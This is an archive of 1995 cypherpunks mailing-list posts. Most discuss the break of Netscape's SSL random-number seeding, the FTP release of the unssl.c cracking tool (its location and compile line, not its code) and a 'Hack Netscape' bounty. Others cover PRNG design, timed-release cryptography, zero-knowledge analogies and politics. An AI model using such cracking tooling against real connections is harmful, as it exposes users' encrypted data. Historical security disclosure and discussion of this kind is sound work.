					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Mon, 18 Sep 95 12:59:21 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape's random numbers
In-Reply-To: <v01510100ac836b357d90@[206.1.161.4]>
Message-ID: <9509181958.AA11906@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>Before we go to the news, perhaps we should demonstrate the exploitation of
>this hole. It would certainly make selling this story a whole lot easier.

In the first place it is a bit late for that. The problem is all over the net 
already. Expect press coverage tommorow or Wednesday. Secondly I would prefer a 
solution.


Random number generation and maintenance is a whole lot harder than RFC 1750 
makes out. Although that RFC has some usefull ideas it does not provide a 
blueprint fora secure ergodicity management facility.

When I wrote code for Shen I was very carefull in the use I made of the output 
of the ergodicity manager. In particular correlation is a major concern. If a 
pseudo random output is exposed it must not predjudice other random values.

Consider the class of attacks where Mallet receives a message from Alice and 
uses the knowledge of his random number to discover the random number used in 
Alice's later message to Bob.

I always use hash functions as a "one way trap" to ensure that values cannot be 
reverse engineered to discover the internal state of the random number 
generator. I am also careful to erase all internal state before exiting the 
program. 


	Phill Hallam-Baker




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 18 Sep 95 13:17:50 PDT
To: Rich Salz <rsalz@osf.org>
Subject: Re: Netscape's random numbers
In-Reply-To: <9509181622.AA15284@sulphur.osf.org>
Message-ID: <199509182017.QAA00699@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Rich Salz writes:
> The Netscape license explicitly prohibits decompiling (except where such
> prohibition is illegal).

Which probably is most of the U.S.

It would be remarkably stupid for them to try to enforce the
provision.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@csclub.uwaterloo.ca (Ian Goldberg)
Date: Mon, 18 Sep 95 13:22:52 PDT
To: cypherpunks@toad.com
Subject: unssl.c available for ftp (was: Netscape's random numbers)
In-Reply-To: <v01510100ac836b357d90@[206.1.161.4]>
Message-ID: <43kkdu$8qa@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <v01510100ac836b357d90@[206.1.161.4]>,
Dietrich J. Kappe <goedel@tezcat.com> wrote:
>>Congrats, nice job!
>
>Yes, well done.
>
>Before we go to the news, perhaps we should demonstrate the exploitation of
>this hole. It would certainly make selling this story a whole lot easier.
>
Too late.  The news (in the form of a call from John Markoff, New York Times)
came to Dave and me first thing this morning.

In other news:

unssl.c is presently in the /pub/cypherpunks/incoming/ directory
on ftp.csua.berkeley.edu.  Remember: you must be a "US person"
to download it blah blah blah.  It will (hopefully) soon move to
a more suitable location under /pub/cypherpunks.

The HP on my desk seems to like compiling it with "gcc -O3 -o unssl unssl.c".
YMMV.

   - Ian "it's now about 1:20 pm PDT; I wonder when it will get exported..."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Mon, 18 Sep 95 13:42:07 PDT
To: cypherpunks@toad.com
Subject: Good random seeds
Message-ID: <199509182042.QAA02146@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain



	Since we can all see how badly time works, I'd like to point out
that Will Price, author of the excellent Cryptdisk utility for the Mac,
uses mouse movements to seed his PRNG.

	His code is available for a small fee, and I'd strongly suggest
that people who need good, easy PRNs take a look at it, and also take a
long look at RFC1750, randomness reccomendations for security (or
something like that.)

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Mon, 18 Sep 95 17:14:24 PDT
To: iagoldbe@calum.csclub.uwaterloo.ca (Ian Goldberg)
Subject: Re: unssl.c available for ftp (was: Netscape's random numbers)
In-Reply-To: <43kkdu$8qa@calum.csclub.uwaterloo.ca>
Message-ID: <199509190006.RAA28102@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Now available in /pub/cypherpunks/cryptanalysis
Please do not export.

-- 
sameer						Voice:   510-601-9777
Network Administrator				FAX:	 510-601-9734
Community ConneXion: The NEXUS-Berkeley		Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Mon, 18 Sep 95 14:54:39 PDT
To: Christian Wettergren <cwe@Csli.Stanford.EDU>
Subject: Re: Code of Law ["Noise"]
In-Reply-To: <199509181837.LAA01709@Csli.Stanford.EDU>
Message-ID: <Pine.SOL.3.91.950918170807.6474A-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 18 Sep 1995, Christian Wettergren wrote:

> 
> | >"The basic idea behind the movement," says
> | >University of Oregon history professor Richard Brown, "is
> | >'popular sovereignty,' that people are above the law.
> | >These people are alienated from the legal system. To some
> | >extent it sounds like they're also trying to settle
> | >personal scores."
> 
> I suddenly got very cold.
> 
> I thinnk the world has seen enough of 'revolutionary justice',
> both in the Soviet Union; there are some fascinating passages
> of Lenin about avoiding the bourgouise invented 'justice' concept, 
> and that the revolution was well 'above' that whole thing,
> 
> and im Germany.
> 
> And I guess in current China.
> 
> When the people and the govering establishement has lost contact
> this much, you're in for trouble.
> 
> (Ok, remember I'm a dumb Swede, that still happens to believe that
> State and People doesn't have to be enemies. And I do believe in a
> sensible dialog between different interest groups etc etc. Flame
> away, I'm just dumb anyway. ;-))
> 
> /Christian
> 


There has been much handwringing today over some poor guys out west
who have been  holding their own "common law courts,"  along with 
wonderment that they lack faith in the American justice system.

In the last year we've seen in the national news:

* FBI and BATF murdering, lying, & tampering with evidence. (Waco/ Ruby 
  Ridge hearings / WTC bombing trial /etc.)

* Cops confiscating cash from citizens in Atlanta, and pocketing it.

* Cops fabricating evidence wholesale in Philadelphia.

* Cops admitting to beating people in LA.

* Cops from NYC having drunken riots in D.C.

* Cops from around D.C. beating a suspect - later found to be 
  innocent - until he was comatose.

* Cops having a shootout - among themselves - in AZ.

* Cops raping and murdering in New Orleans.

In several of these cases, little or no punishment resulted.


A couple of local incidents, in Knoxville, TN:

* Several months ago, the local paper (Knoxville News-Sentinel) revealed 
that jailers at the city/county jail are in the habit of  hanging 
prisoners by their wrists until their hands turn black.  Those that are 
really disfavored are also forced to wear a vomit-filled hood.  To my 
knowledge, no one has yet been has been taken to task for this.

* Knox medical examiner Randall Pedigo was found to be drugging and
raping young boys.  He pulled a gun on the cops and was shot.  After 
recovering, he was allowed to plead guilty in return for a 1-year sentence
at the penal farm.


The mayor of Knoxville, Victor Ashe, is active in the U.S. Conference 
of Mayors and has served as a spokesman for the organization.  Presumably,
he and they are untroubled by events like the above.  I can't recall him -
or them - so much as expressing concern.



The "angry white men" have just figured out what the angry black men 
have known for a long time:  that the "justice system" in the US is a tool
used by some to impose their will on others.  It has little if 
anything to do with justice.

Is this radical right-wing rhetoric or is it Marxist?  Or is it just a 
statement of fact?

What percentage of the population can think this way without the jury 
system failing?  What percentage does think this way?  Is that why we're 
hearing calls for the abolition of the jury system?


Tenuous crypto tie:  

Why would anyone trust these guys to hold our escrowed keys?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Mon, 18 Sep 95 08:15:16 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Anonymous WWW proxy Alpha release available
In-Reply-To: <199509181421.KAA01875@panix.com>
Message-ID: <9509181514.AA16343@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


Duncan Frissell writes:
 > Thanks.  What we now need is a proxy located in the US with good connections
 > for performance.
yes ! yes ! anyone with tcl-dp and tclX installed to run one ?
we need to have a 'network' of proxies !
[maybe I shall 'translate' the prototype in perl or C... but I'm much
more used to Tcl than Perl, and Tcl writting is infintly faster than C
for web tasks]

 > Does anyone know a good test page that reads back the info
 > your browser is putting out so you can test proxies?

http://hplyot.obspm.fr:8001/
shows what has been sent to it by the browser (between other www
goodies) [You can put the following 
---8<---
#! /bin/sh
echo "Content-type: text/plain"
echo ""
/bin/env
---8<---
as a minimal debugging cgi too, on any httpd, if you want]

regards
dl

-- 
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 18 Sep 95 17:27:49 PDT
To: cypherpunks@toad.com
Subject: Re: Time release crypto
Message-ID: <ac835abf07021004c9ff@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:16 PM 9/18/95, Stephen D. Williams wrote:
>What minimal requirements would be needed to support encrypted packets/files
>that a holder could only decrypt after a certain date/time?
>(Time Escrow?)


An interesting topic, of which there have been several discussions of in
the past few years. A check of the archives will reveal dozens of articles.
(My own archives contain more than 30 articles on this topic.)

I'm not trying to squelch any debate. I would ordinarily respond to this
thread, and write an article, but with all the archived articles, why
bother?

This last came up in a major way in June of 1994, with several articles
posted by me, Eric Hughes, Eli Brandt, Peter Wayner, Russ Busdiecker, Karl
Barrus, Blanc Weber, and all the Usual Suspects (but not Kiser Sose).


I'll forward an article (below) I did in in 1993 on timed-release crypto.

--Tim May


Date: Wed, 10 Feb 93 11:55:45 -0800
To: cypherpunks@toad.com
From: tcmay@netcom.com (Timothy C. May)
Subject: Timed-Release Crypto


Cypherpunks,

I want to share with you folks some preliminary ideas on "timed-release
cryptographic protocols," that is, methods for sending encrypted messages
into the future.

These ideas need more work, but since I have recently mentioned them to Hal
Finney, Max More, Mark Miller, and perhaps others, I guess it's time to say
something here.

Why would anyone want to send encrypted (sealed) messages into the future?

1. Foremost, to send money into the future, while protecting it in the
meantime from seizure, taxation, etc. This might be of interest to cryonics
folks who want to arrange for their own revival/reanimation at some time in
the future. (Existing systems have relied on creating endowments, insurance
contracts, trust funds, and the like. The trust of the agent is the means
for sending funds into the future--clearly this agent could be compromised,
raided, taxed, put out of business, etc. Though I am personally not a
cryonics client, I began thinking about this problem in 1989 and talked it
over with Phil Salin, who, ironically, is now himself in cryonic
suspension.)

2. To fulfill contracts with long payoff dates. One might wish to deliver
money at some future date, or to supply information at some future date.

3. "In the event of my death"-type messages, with guaranteed delivery of
some message or text in the event that something happens (or, of course,
that the message is not "countermanded" by the sender).

4. A software publisher might place source code in a timed-release escrow,
agreeing to release the code in 10 years, for whatever reason. (Of course,
he may lie, but that's another issue. Possibly the digital time-stamping
work of Haber and Stornetta can be used.)

I'm sure you can think of other uses. I argue that this timed-release
message is a kind of cryptographic primitive...though it may be argued that
it's just a variant of an ordinary message transmission, albeit one through
time instead of through space.

Diving right in, some approaches:

A message is encrypted (standard public key means, though private key
methods work the same way) and "sent out." Perhaps into a network of
remailers or a Cuperman-style "pool" (BTW, my compliments to Miron C. for
deploying such a thing..the first of many, I suspect). The encrypted
message is just a "passive" item in this scheme...it stays encrypted, is
available to all, etc. (in other words, the security of the message being
time-released does not in any way depend on hiding the existence or
location of the encrypted message, though of course it is important that
the encrypted message be widely distributed and not explicitly advertised
or tagged as being a timed-release message.

(Detail note: Why not? Because some governments may see timed-release
messages as automatically being tax-avoiding, cryonics-supporting,
seditious, etc., messages and may attempt to hunt down and erase any such
messages...perhaps via "hunter-killer crypto viruses" or somesuch.)

Let us suppose the encrypted message is to be unlocked in 30 years. (It
could also be when some recognized event occurs, such as a Mars landing or
the death of the sender, or whatever...you'll see how this works). How can
the decryption key be prevented from being used in the meantime?

(To make this clear: both the encryted message _and_ the decryption key are
"in circulation" during all of those 30 years. Any scheme that relies on
the sender himself keeping the decryption key "secret" for those 30 years
is of course no fun at all...it's just what we have today and involved no
new cryptographic primitives, just ordinary human-mediated secrecy.)

But if the encrypted message and the decryption key are both in circulation
for all of those 30 years, what's to keep someone from decrypting the
message in _one_ year, for example?

The answer: independent escrow agents who handle large volumes of messages
and agree to hold them for various amounts of time. Because they have no
idea of what's insided the encrypted messages they hold--and some may be
"test" messages deposited deliberately by reputation-rating or
credentialling agencies, such as "Consumers Crypto Guide"--and because
their business is holding things in escrow, they will not generally open
messages before the time specified.

"Aha!," I hear you exclaim, "Tim's scheme depends solely on the trust of
these escrow agents, and that's no different from depositing a sealed
envelope with your friendly lawyer and asking him to promise not to peek."

Here's how crypto and reputation-based sytems make my scenario different
(and stronger, I am arguing):

- an ecology of many escrow services, many pools, many encrypted-message
senders makes for a more robust system against subversion of any single
agent.

- no escrow agent knows what is contained in a sealed message, hence the
tempation to peek is reduced. (A wrinkle: escrow agents, like remailers,
will probably go to automatic hardware that is tamper-resistant (cf.
discussion of tamper-resistant or tamper-responding, modules in the Crypto
Glossary distributed at the first physical Cypherpunks meeting and
available in the archives). Thus, the hardware will automatically execute
certain protocols and make peeking a pain.)

- the best escrow agents (someday) may in turn increase security and their
own reputations by in turn using secondary contracts, i.e., by contracting
with _other_ escrow agents to seal parts or all of their messages.

- what results is that the original message is scattered around in various
publicly available locations (perhaps paid-for by dribbles of cryto-money
from crypto escrow agents, but this is a detail easily worked out in
various ways). The decryption key to the original message is itself broken
up into several or many pieces and scattered to a network of
"remailer"-like agents (they are essentially "remailers into the future,"
by agreeing as part of their protocol to hold messages for some amount of
time). As time passes, these various messages (pieces, remember) are
retrieved, forwarded, and generally bounced around the network.

- some escrow agents may be just "fixed delay" nodes. For example, "Alice's
Rest Stop" remailer node widely advertises that it will take in messages
and simply delay them for some fixed time, e.g., for a year. For some fee
based on message size. (Clearly the fixed time delay is a crufty approach,
much less flexible than variable delays negotiated by the messages
themselves, but it makes the idea clearer in some ways: a network of many
such one-year delays could thus "send" a message into the future in
one-year jumps.)

(It is important to remember that these messages are "first-class objects,"
to borrow a phrase, and that all messages essentially look the same and
have the same "rights" (Dean Tribble is probably barfing at my
appropriation of object-oriented lingo, but it seems appropriate). That is,
inspection of the bytes will not reveal to someone whether the message is a
$2 message, a simple love letter, a business contract, a remailed item, a
$100K cryonics payment, etc. Thus, the "authorities" cannot simply target
some class of messages and ban them or launch "hunter-killer crypto
viruses" against them, at least not without shutting down the whole
system!)

- the individual pieces may have instructions attached, such as "You will
be paid 10 crypto credits if you hold me for one year and then decrypt me."
(Not to belabor the point, but the means by which this "contract" can be
enforced are that the escrow agents never know when they're being tested,
when they're being monitored by rating services. This kind of "trust" is
what allows ordinary deposit banks to work...their business is talking
deposits and lending money, not repudiating the honest claims of
customers.)

- thus, I envision a swarm of messages being stored-and-forwarded in space
and time, with an observor seeing only  bits flowing around. Nobody except
the original "launcher" (who needs to be fairly careful about the path he
selects, about robustness against some fraction of the escrow/remailer
agents going out of business, etc.) knows what's going on.

- and as the end of the 30 years period approaches, to continue with the
example I started with, the decryption key gets "reconstituted" in various
ways (depends on what is desired, and how protocols evolve...I don't claim
to have the details already worked out). For example, after 30 years the
various messages stored in escrow accounts are forwarded separately to "The
Immortalist Foundation," which may in fact be a digital pseudonym (as we
have discussed so many times here). This entity puts the pieces together,
sort of like combining the missing pieces of a text and reconstituting a
genie or demon, and finds it can now unlock the original encrypted message.
It finds, say, a million crypto credits, or the location of some physical
treasure, or whatever.

(Needless to say, there are some obvious questions about what long-term
money will be stable, what banks will still exist after 30 years, and so
on. I expect new forms of time deposits to evolve. Can the original sender
be expected to know what will evolve before he seals his original message?
Some obvious issues to work on--I never claimed it would be trivial, or
static. One approach is to allow some human intervention, where an
"investment agent" opens a digital money message, redeems it, and reinvests
it in some new instrument. As usual, he would not know who the original
investor was and would be "tested" by reputation-rating agencies. It _does_
get complicated, I know.)

The Key Point: Messages sent into this network of remailers, escrow
accounts, pools, and investment agents are untraceable to the sender and
are generally unidentifiable. To break a single message involves breaking
the entire system (or colluding with enough remailer nodes, as in any
DC-Net sort of system). As with remailer networks, the expectation is that
they will become sufficiently pervasive and trans-nationalized that
breaking the entire system is just too painful and difficult (much the way
the Net is already too pervasive to easily shut down, even if some uses of
it are undesirable to various national authorities).

Timed-release messages are objects that can be transmitted, encrypted, and
can carry further instructions on where to mail them next, on how much
digital money to pay to this next link, and various other instructions or
protocols.

(In other words, they are "agents" that can negotiate various contracts,
for remailing , for storage, etc. Since they are "powerless" in a human
sense, their security is provided by double-checks--perhaps by other agents
who are watching and waiting--and by the general "shell-game" system of
reputations, credentialling, and so on.)

To make this scheme clearer in a simple way, I could publicly post an
encrypted message to this list, or in one of the "pools," and then scatter
the decryption key in several pieces with several members of this list,
paying them $1 each to "hold" their piece for, say, a month. At the end of
the month, they would fulfill their end of the bargain by forwarding the
piece they hold to some public place or pool and the decryption key would
be reconstituted (don't press me for exact details....PGP doesn't support
this directly, but could). For robustness against loss of some of the
messages, an n-out-of-m voting scheme could be used (e.g., any 5 of 8
pieces are sufficient to reconstruct the decryption key).

The result is a message from the past, a timed-release message.

I'm anxious to hear your comments. I think such a cryptographic primitive
could be useful for a lot of purposes.

-Tim May

--

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 18 Sep 95 17:40:19 PDT
To: cypherpunks@toad.com
Subject: Caribbean Internet Services?
Message-ID: <ac835f9008021004ec69@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



A brief note, though the hardship to the Caribbean islands will not be brief.

St. Thomas, St. Croix, and other islands were hit extremely hard by
hurricane Marilyn. Previous hurricanes, including Luis, also hit some of
the islands.

Power in St. Thomas may not be back for a year in some parts. The roads,
sewers, power lines, phone system, etc. will likely have to be completely
rebuilt.

(Yes, there have been more hurricanes this year than in most years...not
clear if it's just a Poisson fluctuation, or symptomatic of deeper weather
pattern changes.)

ObCypherpunks Relevance: A couple of past or current list members have
nascent Internet plans in some of these islands. (I think one of them is
way south, just off Venezuela.)

I suspect "Caribbean Data Havens" and "Internet Sites" are further off than
they were a few months ago.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Mon, 18 Sep 95 17:59:21 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Caribbean Internet Services?
Message-ID: <v02120d0cac83d29f4af9@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



Actually, it just highlights the need to make sure one is relying
on buried/underwater cables, as well as the importance of hurricane
resistant architecture.

Virtually all of the buildings destroyed would have been obviously
unsuitable for locating important servers even before this recent
reminder.

Note that this is not an endorsement or a condemnation of "Libertaria
in Cyberspace" or in any particular physical location.

>I suspect "Caribbean Data Havens" and "Internet Sites" are further off than
>they were a few months ago.
>
>--Tim May
>
>---------:---------:---------:---------:---------:---------:---------:----
>Timothy C. May              | Crypto Anarchy: encryption, digital money,
>tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
>Corralitos, CA              | knowledge, reputations, information markets,
>Higher Power: 2^756839      | black markets, collapse of governments.
>"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Mon, 18 Sep 95 18:11:50 PDT
To: cypherpunks@toad.com
Subject: Hack Netscape!
Message-ID: <199509190106.SAA02447@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	The T-shirt isn't designed yet but I think the web page can
take public consumption now. Check out http://www.c2.org/hacknetscape

-- 
sameer						Voice:   510-601-9777
Network Administrator				FAX:	 510-601-9734
Community ConneXion: The NEXUS-Berkeley		Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Mon, 18 Sep 95 14:46:49 PDT
To: cypherpunks@toad.com
Subject: Time release crypto
Message-ID: <m0suoUI-0009yvC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


What minimal requirements would be needed to support encrypted packets/files
that a holder could only decrypt after a certain date/time?
(Time Escrow?)

Or a server that releases keys if a 'heartbeat' isn't or a trigger is received?
(Escrow in the banking/legal sense.)
(Video/sound recordings for security, opened at court's request., Ecash
Escrow, missing persons)

The obvious is a server that releases keys periodically (and serves old keys
at will).

Is there any way to make this trustable?

Multiple servers with shared (xor split, etc.) keys of some kind?


Design ideas?


Applications: 

Gov. docs with expiration dates for privacy/secrecy.

Source code for projects (if a company folds, copyright expires, etc.).

Contract release to companies, public, etc.
(15 minute stock data, agreements for commercial use initially,
 public/fair use later)

sdw
-- 
Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw@lig.net http://www.lig.net/sdw
Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011
OO/Unix/Comm/NN       ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Mon, 18 Sep 95 09:58:44 PDT
To: cypherpunks@toad.com
Subject: Re: Explaining Zero Knowledge to your children
Message-ID: <9509181655.AA06115@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain


> Clever, but I think it's missing an important element of zero knowledge
> interactive proof systems. For example, why not simply open _both_ hands?

That's the same problem as with the cave: Why not just go into the left
passage and come out of the right passage.


Both are absolute proofs. If you have two identical bills you must be able
to copy them.

In a cryptographical proof there is always the chance to guess. The chance
is sometimes 50%, sometimes very small.


What about this idea:

Alice is caught in a dark room somewhere on the world. She doesn't know
where she is, but there is a telephone in the room and she calls Bob to
ask him where she is. Bob claims to know it but doesn't want to reveal. 
He calls her back. When the phone is ringing, he has proven the knowledge
of her phone number, but she still doesn't know where she is or how he
could know. And there is still the chance that Bob has guessed the number.



Mmmh,

Hadmut







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Mon, 18 Sep 95 16:06:45 PDT
To: perry@piermont.com
Subject: Re: Netscape's random numbers
Message-ID: <9509182305.AA15954@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>It would be remarkably stupid for them to try to enforce the
>provision.

Perhaps, but it that's secondary to the bad spin the media could
end up having on it.  Preventing that problem was a major point of
my article, which discussed the media and netscape not at all.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Mon, 18 Sep 95 19:16:06 PDT
To: cypherpunks@toad.com
Subject: COMMUNITY CONNEXION OFFERS REWARD FOR EXPOSING ENCRYPTION FLAWS
Message-ID: <199509190211.TAA07099@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


For Immediate Release
Contact: sameer@c2.org 510-601-9777

COMMUNITY CONNEXION OFFERS REWARD FOR EXPOSING ENCRYPTION FLAWS

Sept 19 1995 - Community ConneXion, a privacy server and ISP in
Berkeley, California, today announced that it will be offering an
incentive to the net to expose security flaws in some software that is
advertised on the net as secure.

This weekend a member of the cypherpunks community, Ian Goldberg, and
his officemate, David Wagner, revealed a method which would allow
someone to break the encryption used by Netscape Navigator in 25
seconds. Netscape Communications Corporation has been advertising
their products as a "secure" way of communicating sensitive
information over the net. People have been using this Netscape
software to send their credit card numbers over the net, communicate
with their brokers, and other tasks requiring security.

"Netscape was apparently relying on security by obscurity in this
case," said Community ConneXion's founder, Sameer Parekh.

In light of this recent break and the earlier two brute force attacks
on the encryption used in the international version of Netscape
Navigator (crippled because of restrictions on the export of
cryptography from the United States) Community ConneXion has offered a
challenge to the net community to find more holes. Ian, David, and the
people responsible for the brute-force attacks will be receiving free
limited-edition T-shirts for their work.

"The more holes people find, the more holes will get fixed. Netscape
makes the most widely used commercial WWW software out there, so it is
in the net's best interest for netscape to have good security. By
exposing the holes in netscape, we will hopefully get them fixed,"
said Sameer.

Details about the HackNetscape promotion are available from
http://www.c2.org/hacknetscape, or by sending mail to
hacknetscape@c2.org.

Community ConneXion is the premier internet privacy ISP. They offer
anonymous accounts, remailers, and psuedonym servers, in addition to
the standard ISP fare of webspace and dialup IP access. Information is
available from http://www.c2.org or mailing info@c2.org.

Netscape and Netscape Navigator are trademarks of Netscape
Communications Corporation. This promotion is not affiliated with NCC.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Mon, 18 Sep 95 02:11:20 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape Navigator 2.0 will implement secure e-mail
In-Reply-To: <43jau5$qbj@tera.mcom.com>
Message-ID: <Pine.SOL.3.91.950918185301.29263B-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain


On 18 Sep 1995, Jeff Weinstein wrote:
> The implementation guide recommends using rc2-cbc 40-bit for content
> encryption when there is no way to determine the capabilities of the
> recipient.  When you do know what the recipient can do, it recommends
> using RC2-CBC with a longer key or DES-CBC.

Hmm....  notice the use of a non public cipher as the base cipher.... 
what a shame.... 

A note for non-USA people, the next version of SSLeay will include the 
full fuctionality of RSAref/RSAeuro and I should soon have the PKCS-7 
stuff finished in the next release after that.  I've almost finished the 
documentation of the encryption/RSA type routines. The encryption/open/seal 
routines supporting any cipher that conforms with a specified Cipher API.

It will be shipping with examples of des-ecb, des-cfb, des-cbc, des-ede2, 
des-ede3, idea-ecb, idea-cfb, idea-cbc and rc4-128.  If people could send 
me the official Object identifiers for these ciphers, I'll be able to 
support them in PKCS-7, otherwise they will only be supported in PEM mode.
eg,
rc4 is '1 2 840 113549 3 4'
but I don't even know what des in cbc mode is.  I lack documentation.
If any-one can email SMIME/PKCS-7 stuff that is encrypted/sealed, I'll be 
able to extract the object identifiers.


> For key encryption support for RSA with key sizes of 512 to 1024 is
> required, and support for 2048 bit keys is recommended.  A minimum
> key size of 768 bits is recommended for US users.

Again, SSLeay has no restrictions, 4096 bits anyone :-)

eric (who is just lacking documentation :-(
--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups than the message contents :-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Mon, 18 Sep 95 16:15:29 PDT
To: cypherpunks@toad.com
Subject: Your name in print
Message-ID: <9509182315.AA16020@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>From owner-www-security@ns2.rutgers.edu Mon Sep 18 17:36:41 1995
Received: from ns2.rutgers.edu (ns2.rutgers.edu [128.6.21.2]) by postman.osf.org (8.6.9/8.6.x) with ESMTP
	id RAA13528; Mon, 18 Sep 1995 17:36:34 -0400
Received: (from daemon@localhost) by ns2.rutgers.edu (8.6.12+bestmx+oldruq+newsunq/8.6.12) id MAA00546 for www-security-outgoing; Mon, 18 Sep 1995 12:35:37 -0400
Received: from whiz.mfi.com (whiz.mfi.com [198.71.19.34]) by ns2.rutgers.edu (8.6.12+bestmx+oldruq+newsunq/8.6.12) with SMTP id MAA00534 for <www-security@ns2.rutgers.edu>; Mon, 18 Sep 1995 12:35:18 -0400
Received: from ccmail2.mfi.com by whiz.mfi.com (AIX 3.2/UCB 5.64/4.03)
          id AA31083; Mon, 18 Sep 1995 09:26:41 -0700
Received: from ccMail by ccmail2.mfi.com
	id AA811441583 Mon, 18 Sep 95 09:26:23 PST
Date: Mon, 18 Sep 95 09:26:23 PST
>From: "Prince, Cheryl" <cprince@mfi.com>
Encoding: 663 Text
Message-Id: <9508188114.AA811441583@ccmail2.mfi.com>
To: www-security@ns2.rutgers.edu
Subject: security article
Sender: owner-www-security@ns2.rutgers.edu
Precedence: bulk
Errors-To: owner-www-security@ns2.rutgers.edu
Status: RO



I am an editor at a business technology publication and am currently 
researching a piece on network security at financial institutions as well as 
the feasability of secure Internet transactions and banking on the world wide 
web. 

I will be interviewing individuals who can speak to these issues and can talk 
about whether the banking industry can in fact move much of its activity on 
line without risking the loss of billions of dollars to online theft and other 
related damage.  

If you are familiar with this subject matter and/or have any experience in the 
financial industry, please email me at: cprince@mfi.com

Thanks,

CJ Prince





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Mon, 18 Sep 95 19:23:37 PDT
To: tedwards@Glue.umd.edu (Thomas Grant Edwards)
Subject: Re: Hack Netscape!
In-Reply-To: <Pine.SUN.3.91.950918220842.9126A-100000@volt.isr.umd.edu>
Message-ID: <199509190217.TAA07775@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Community ConneXion doesn't have the budget to give a free
T-shirt to everyone who helped. ;-)

	You can buy one of the general release t-shirts we'll be
making though. 

> 
> On Mon, 18 Sep 1995, sameer wrote:
> 
> > 	The T-shirt isn't designed yet but I think the web page can
> > take public consumption now. Check out http://www.c2.org/hacknetscape
> 
> Heh, what about a shirt for the people who worked through keyspace for 
> the second crack? ;)
> 
> -Thomas
> 


-- 
sameer						Voice:   510-601-9777
Network Administrator				FAX:	 510-601-9734
Community ConneXion: The NEXUS-Berkeley		Dialin:  510-658-6376
